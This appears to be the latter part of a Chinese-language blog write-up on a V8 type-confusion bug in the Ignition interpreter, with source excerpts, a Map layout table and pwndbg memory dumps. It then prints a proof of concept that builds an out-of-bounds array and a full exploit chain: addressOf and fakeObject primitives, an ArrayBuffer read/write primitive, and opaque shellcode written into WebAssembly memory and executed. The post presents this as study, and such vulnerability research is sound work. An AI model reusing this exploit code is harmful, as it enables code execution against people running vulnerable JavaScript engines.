bool LookupIterator::HolderIsReceiverOrHiddenPrototype() const {
DCHECK(has_property_ || state_ == INTERCEPTOR || state_ == JSPROXY);
// Optimization that only works if configuration_ is not mutable.
if (!check_prototype_chain()) return true;
DisallowHeapAllocation no_gc;
if (*receiver_ == *holder_) return true;
if (!receiver_->IsJSReceiver()) return false;
JSReceiver current = JSReceiver::cast(*receiver_);
JSReceiver object = *holder_;
if (!current->map()->has_hidden_prototype()) return false;
// JSProxy do not occur as hidden prototypes.
if (object->IsJSProxy()) return false;
PrototypeIterator iter(isolate(), current, kStartAtPrototype,
PrototypeIterator::END_AT_NON_HIDDEN);
while (!iter.IsAtEnd()) {
if (iter.GetCurrent<JSReceiver>() == object) return true;
iter.Advance();
}
return false;
}
其中的if (!current->map()->has_hidden_prototype())
条件具有随机性,我们来看一下它是怎么判断的
BIT_FIELD_ACCESSORS(Map, bit_field3, has_hidden_prototype,
Map::HasHiddenPrototypeBit)
#define BIT_FIELD_ACCESSORS(holder, field, name, BitField) \
typename BitField::FieldType holder::name() const { \
return BitField::decode(field()); \
} \
void holder::set_##name(typename BitField::FieldType value) { \
set_##field(BitField::update(field(), value)); \
}
主要就是取出has_hidden_prototype
这个位进行判断,其中MAP布局如下
+---------------+---------------------------------------------+
| _ Type _ | _ Description _ |
+---------------+---------------------------------------------+
| TaggedPointer | map - Always a pointer to the MetaMap root |
+---------------+---------------------------------------------+
| Int | The first int field |
`---+----------+---------------------------------------------+
| Byte | [instance_size] |
+----------+---------------------------------------------+
| Byte | If Map for a primitive type: |
| | native context index for constructor fn |
| | If Map for an Object type: |
| | inobject properties start offset in words |
+----------+---------------------------------------------+
| Byte | [used_or_unused_instance_size_in_words] |
| | For JSObject in fast mode this byte encodes |
| | the size of the object that includes only |
| | the used property fields or the slack size |
| | in properties backing store. |
+----------+---------------------------------------------+
| Byte | [visitor_id] |
+----+----------+---------------------------------------------+
| Int | The second int field |
`---+----------+---------------------------------------------+
| Short | [instance_type] |
+----------+---------------------------------------------+
| Byte | [bit_field] |
| | - has_non_instance_prototype (bit 0) |
| | - is_callable (bit 1) |
| | - has_named_interceptor (bit 2) |
| | - has_indexed_interceptor (bit 3) |
| | - is_undetectable (bit 4) |
| | - is_access_check_needed (bit 5) |
| | - is_constructor (bit 6) |
| | - has_prototype_slot (bit 7) |
+----------+---------------------------------------------+
| Byte | [bit_field2] |
| | - is_extensible (bit 0) |
| | - is_prototype_map (bit 1) |
| | - is_in_retained_map_list (bit 2) |
| | - elements_kind (bits 3..7) |
+----+----------+---------------------------------------------+
| Int | [bit_field3] |
| | - enum_length (bit 0..9) |
| | - number_of_own_descriptors (bit 10..19) |
| | - is_dictionary_map (bit 20) |
| | - owns_descriptors (bit 21) |
| | - has_hidden_prototype (bit 22) |
| | - is_deprecated (bit 23) |
| | - is_unstable (bit 24) |
| | - is_migration_target (bit 25) |
| | - is_immutable_proto (bit 26) |
| | - new_target_is_base (bit 27) |
| | - may_have_interesting_symbols (bit 28) |
| | - construction_counter (bit 29..31) |
| | |
+*************************************************************+
| Int | On systems with 64bit pointer types, there |
| | is an unused 32bits after bit_field3 |
+*************************************************************+
| TaggedPointer | [prototype] |
+---------------+---------------------------------------------+
| TaggedPointer | [constructor_or_backpointer] |
+---------------+---------------------------------------------+
| TaggedPointer | If Map is a prototype map: |
| | [prototype_info] |
| | Else: |
| | [raw_transitions] |
+---------------+---------------------------------------------+
| TaggedPointer | [instance_descriptors] |
+*************************************************************+
! TaggedPointer ! [layout_descriptors] !
! ! Field is only present if compile-time flag !
! ! FLAG_unbox_double_fields is enabled !
! ! (basically on 64 bit architectures) !
+*************************************************************+
| TaggedPointer | [dependent_code] |
+---------------+---------------------------------------------+
与MAP对象的内存对应起来
pwndbg> p/x current
$178 = {
<v8::internal::HeapObject> = {
<v8::internal::Object> = {
static kHeaderSize = 0x0,
ptr_ = 0x61f6349ed01
...................
pwndbg> x /20gx 0x61f6349ed00
0x61f6349ed00: 0x00002deae918ce19 0x0000317690b80c21
...................
pwndbg> x /20gx 0x00002deae918ce18
0x2deae918ce18: 0x0000317690b81e59 0x0000080000000003
0x2deae918ce28: 0x00002deae918cdf9 0x00002deae918cdf9
..................
可以看到,对应bit_field3
的位置是一个对象指针,因此,bit_field3
的值具有随机性,是有几率可以满足条件的。这也说明了HolderIsReceiverOrHiddenPrototype
是有可能返回true的。多次运行后,满足条件,接下来就会进入SetDataProperty
► 2529 if (it->HolderIsReceiverOrHiddenPrototype()) {
2530 return SetDataProperty(it, value);
2531 }
pwndbg> p it->HolderIsReceiverOrHiddenPrototype()
$183 = true
SetDataProperty函数如下
Maybe<bool> Object::SetDataProperty(LookupIterator* it, Handle<Object> value) {
.....................
// Possibly migrate to the most up-to-date map that will be able to store
// |value| under it->name().
it->PrepareForDataProperty(to_assign);
// Write the property value.
it->WriteDataValue(to_assign, false);
................
}
主要是调用了it->WriteDataValue(to_assign, false);
void LookupIterator::WriteDataValue(Handle<Object> value,
bool initializing_store) {
DCHECK_EQ(DATA, state_);
Handle<JSReceiver> holder = GetHolder<JSReceiver>();
if (IsElement()) {
Handle<JSObject> object = Handle<JSObject>::cast(holder);
ElementsAccessor* accessor = object->GetElementsAccessor();
accessor->Set(object, number_, *value);
} else if (holder->HasFastProperties()) {
..................
}
其中accessor->Set(object, number_, *value);
最终调用到的函数是FixedArray::set
126 void FixedArray::set(int index, Object value) {
► 127 DCHECK_NE(GetReadOnlyRoots().fixed_cow_array_map(), map());
128 DCHECK(IsFixedArray());
129 DCHECK_GE(index, 0);
130 DCHECK_LT(index, this->length());
131 int offset = kHeaderSize + index * kTaggedSize;
132 RELAXED_WRITE_FIELD(*this, offset, value);
从上可以看出,这里SetDataProperty实质是将LookupIterator中holder_的elements()所指向的对象(此处实际是一个字符串对象)强制当成一个FixedArray,然后按下标往其中写数据。于是,我们可以直接越界写arr对象的length,从而构造一个OOB数组。
最终构造出的OOB POC(Release版本)
function fun() {
var f = (v1 = (function() {
let a = 0;
let b = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2");
//修改fun的MAP为b
b = "a".repeat(0x800);
//修改arr指针为a
a = [1.1,2.2,3.3];
});
}))=>{};
f();
}
let arr = {};
function fun2() {
fun();
}
function fun3() {
fun();
}
fun2();
//%DebugPrint(fun);
//%SystemBreak();
fun3();
//%DebugPrint(arr);
//%SystemBreak();
fun[0x12] = -1;
print(arr.length);
漏洞利用
function fun() {
var f = (v1 = (function() {
let a = 0;
let obj_arr = 0;
let arr_buf = 0;
let b = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2");
//修改fun的MAP为b
b = "a".repeat(0x800);
//修改arr指针为a
a = [1.1,2.2,3.3];
obj_arr = [{}];
arr_buf = new ArrayBuffer(0x1000);
});
}))=>{};
f();
}
let arr = {};
let obj_arr = {};
let arr_buf = {};
function fun2() {
fun();
}
function fun3() {
fun();
}
//生成错误的字节码
fun2();
//执行错误的字节码
fun3();
fun[0x12] = -1;
print("[+] OOB length:" + arr.length);
/*%DebugPrint(arr);
%DebugPrint(obj_arr);
%SystemBreak();
*/
var buf = new ArrayBuffer(0x8);
var dv = new DataView(buf);
function p64f(value) {
dv.setBigUint64(0,BigInt(value),true);
return dv.getFloat64(0,true);
}
function u64f(value) {
dv.setFloat64(0,value,true);
return dv.getBigUint64(0,true);
}
function big2int(value) {
dv.setBigUint64(0,BigInt(value),true);
return dv.getUint32(0,true);
}
function addressOf(obj) {
obj_arr[0] = obj;
return u64f(arr[0xe]) - 0x1n;
}
function fakeObject(addr) {
arr[0xe] = p64f(addr + 0x1n);
return obj_arr[0];
}
var wasmCode = new Uint8Array([0x00,0x61,0x73,0x6D,0x01,0x00,0x00,0x00,0x01,0x85,0x80,0x80,0x80,0x00,0x01,0x60,0x00,0x01,0x7F,0x03,0x82,0x80,0x80,0x80,0x00,0x01,0x00,0x04,0x84,0x80,0x80,0x80,0x00,0x01,0x70,0x00,0x00,0x05,0x83,0x80,0x80,0x80,0x00,0x01,0x00,0x01,0x06,0x81,0x80,0x80,0x80,0x00,0x00,0x07,0x91,0x80,0x80,0x80,0x00,0x02,0x06,0x6D,0x65,0x6D,0x6F,0x72,0x79,0x02,0x00,0x04,0x6D,0x61,0x69,0x6E,0x00,0x00,0x0A,0x8A,0x80,0x80,0x80,0x00,0x01,0x84,0x80,0x80,0x80,0x00,0x00,0x41,0x2A,0x0B]);
var shellcode = new Uint32Array([186,114176,46071808,3087007744,41,2303198479,3091735556,487129090,16777343,608471368,1153910792,4132,2370306048,1208493172,3122936971,16,10936,1208291072,1210334347,50887,565706752,251658240,1015760901,3334948900,1,8632,1208291072,1210334347,181959,565706752,251658240,800606213,795765090,1207986291,1210320009,1210334349,50887,3343384576,194,3913728,84869120]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var func = wasmInstance.exports.main;
var wasm_shellcode_ptr_addr = addressOf(wasmInstance) + 0x108n;
print("[+] wasm_shellcode_ptr_addr=" + wasm_shellcode_ptr_addr.toString(16));
/*%DebugPrint(arr);
%DebugPrint(arr_buf);
%SystemBreak();
*/
arr[0x1c] = p64f(wasm_shellcode_ptr_addr);
var adv = new DataView(arr_buf);
var wasm_shellcode_addr = adv.getBigUint64(0,true);
print('[+] wasm_shellcode_addr=' + wasm_shellcode_addr.toString(16));
arr[0x1c] = p64f(wasm_shellcode_addr);
//替换wasm的shellcode
for (var i=0;i<shellcode.length;i++) {
adv.setUint32(i*4,shellcode[i],true);
}
//执行shellcode
func();
0x03 感想
通过这个漏洞,学习了V8的Ignition架构,对字节码的生成以及执行过程有了一定的了解,对虚拟机架构也有了一定的了解。对于IC缓存机制也有了一定的理解。这类漏洞比较少见,牵涉到的知识面广,收获很多。
0x04 参考
理解 V8 的字节码「译」
Ignition:V8解释器 「译」
V8是如何执行JavaScript代码的?
Ignition: An Interpreter for V8 [BlinkOn]
抛弃 V8 参数适配器框架:JavaScript 调用提速 40% 的实践
Faster JavaScript calls
V8 Ignition Interpreter && IC
v8 cve-2019-5791:模块耦合导致的类型混淆
Issue 926651: Security: [v8] Type Confusion in Builtins_CallUndefinedReceiver1Handler